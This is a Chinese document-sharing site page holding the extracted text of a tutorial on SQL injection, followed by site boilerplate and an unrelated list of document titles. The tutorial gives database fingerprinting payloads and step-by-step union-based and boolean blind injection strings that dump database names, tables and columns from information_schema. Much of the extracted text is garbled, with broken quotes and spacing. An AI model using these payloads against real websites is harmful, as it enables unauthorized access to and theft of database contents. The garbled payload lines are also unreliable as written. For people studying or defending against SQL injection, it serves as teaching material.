SQL注入原理.docx
《SQL注入原理.docx》由会员分享,可在线阅读,更多相关《SQL注入原理.docx(8页珍藏版)》请在第一文库网上搜索。
1、SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了 sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql: oracleMySQL、 mssql、 access、 sqlite、 postgersqlnosql: mongodb,redisMySQL与MSSQL及ACCESS之间的区别1. MySQL5.0以下没有information schema这个默认
2、数据库2. ACCESS没有库名,只有表和字段,并且注入时,后面必须跟表名,ACCESS没有注释举例:select 1,2,3 from table_ name union select 1,2,3 from table name3. MySQL使用limit排序,ACCESS使用TOP排序(TOP在MSSQL也可使用)判断三种数据库的语句MySQL: and length(user()10ACCESS: and (select count()from MSysAccessObjects)0MSSQL: and (select count ()from sysobjects)0基本手工注入流程
3、1 .判断注入点数字型:id=2-l字符型:、)、)、 )、 ”)注释符:一(这是-空格)、-+、/*/、#这可能是最全的SQL注入总结,很有用2 ,获取字段数order by二分法联合查询字段数,观察页面变化从而确定字段数order by 1order by 50group by译为分组,注入时也可使用,不过我没用过3 .查看显示位尝试使用联合注入利用and 1=2或and 0及id=T2查看显示数据的位置替换显示位改成SQL语句,查看信息(当前数据库,版本及用户名)and 1=2 union select version(),2,3再查询所有数据库and 1=2 union select
4、(select group_concat(schema_name)from informationschema, schemata),2,3查询所有表名unionselect(selectgroup_concat(table_name)frominformation_schema. tables) ,2,3查询所有字段名union select(select group_concat(column_name)frominformation_schema. columns),2,3查询字段内容布尔盲注我在盲注中常用的函数:1. charO 解 ASCII 码;2. mid()截取字符串;举例:m
5、id( hello, ,1,3),从第1位开始截取3位,输出位hel3. substr()与mid()相同,都为截取字符串;4. count。计算查询结果的行数;5. concat ()查询结果合并但保持原有行数;6. group_concat ()查询结果合并但都放在一行中;7. ascii () 查询 ascii 码;猜数据库长度(利用二分法);id=1 and (length(database()1id=l and (length (database()50猜第一个字符,第二个字符,以此类推and ascii(mid(database(),1,1)1and ascii(mid(datab
6、ase(),2,1)1查询当前数据库中所有表名;and (select count (table name)from information schema, tables wheretables schema=database()land (select count (table name)frominformation_schema. tables where tables_schema=database 0) 10查询第一个翥的长度;and (select length (table name)from information schema. tables wheretables_sche
7、ma=database()limit 0,1)10查询表的第一个字符;and ascii(mid(select table_name from information_schema. tables wheretable_schema=database()limit 0,1),1,1)1查询atelier表里有几个字段;and(select count (column_namc)from information_schemae columns wheretable_name = atelier, and table_schema = database()2查询露一个字段长度;and length
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- SQL 注入 原理
第一文库网所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
调和油系列产品项目可行性研究报告.doc
-
三相调压器项目可行性研究报告.doc
-
可行性分析报告设立XX基金管理公司项目可行性分析报告.doc
-
丁硅料项目可行性研究报告.doc
-
二手车交易市场建设项目可行性研究报告.doc
-
二手车交易市场项目可行性研究报告.doc
-
二万头商品猪项目可行性研究报告大纲2.doc
-
二氢松油醇项目可行性研究报告.doc
-
二氧化钛项目可行性研究报告.doc
-
二位五通电磁换向阀项目可行性研究报告.doc
-
二聚酸项目可行性研究报告.doc
-
从化项目可行性报告XXXX329.doc
-
二氧化碳回收项目可行性研究报告.doc
-
水性油墨工程技术研发中心项目可行性研究报告.doc
-
水杀菌消毒项目可行性研究报告.doc
-
水稻种植及加工产业化项目可行性报告.docx
-
水暖五金配件项目可行性研究报告.doc
-
汽车行业-汽车教学整车模型项目可行性研究报告.doc
-
汽车行业-汽车电机零部件项目可行性研究报告.doc
-
汽车行业-汽车空调压缩机支架项目可行性研究报告.doc
-
汽车行业-汽车轮钢项目可行性研究报告摩森咨询·专业编写可行性.doc
-
水果筛选项目可行性研究报告.doc
-
水质改良剂项目可行性研究报告.doc
-
汽车行业-汽车空调电器总成项目可行性研究报告.doc
-
汽车行业-汽车钢卷项目可行性研究报告.doc
-
水泥厂项目可行性研究报告.docx
-
江苏省某幼儿园学校配套停车场项目建议书(代可行性研究报告).docx
-
水泥预制件墙板项目可行性研究报告.doc
-
江西省金韵生态农业示范园建设项目可行性研究报告页(1).docx
-
汽车行业-汽车美容护理用品项目可行性研究报告.doc
-
汽车行业-汽车轮胎套筒项目可行性研究报告.doc
-
汽车行业-汽车阀门项目可行性研究报告.doc
-
高处作业吊篮安装验收表.docx
-
高层建筑给排水消防设计技术.docx
-
高校毕业生到农村社区挂职锻炼解除终止劳动合同证明书.docx
-
高层住宅楼施工方案.docx
-
高收缩压轨迹是恶性肿瘤发生的危险因素.docx
-
高层结构部分混凝土工程施工方案.docx
-
骨料粒径及水灰比对透水混凝土力学特性及透水性影响分析.docx
-
高标准农田建设工作存在的困难问题及建议.docx
-
高新区产业集聚区村庄居委会第一书记工作总结.docx
-
高低温湿热试验箱行业应用之电子材料湿热测试.docx
-
高处作业安全管理制度.docx
-
高低温湿热试验箱怎么做防锈处理?.docx
-
高校培养农村电商专业人才模式构建研究;5300字符.docx
-
高校信息化安全防护解决方案.docx
-
高危细分领域安全风险专项治理工作实施方案.docx
-
高层建筑消防安全疏散设计的问题及对策.docx
-
高分演讲:今天我们为什么读书?.docx
-
高压输电网及变电站C电气部分设计.docx
-
高度重视年轻领导干部纪律教育心得体会.docx
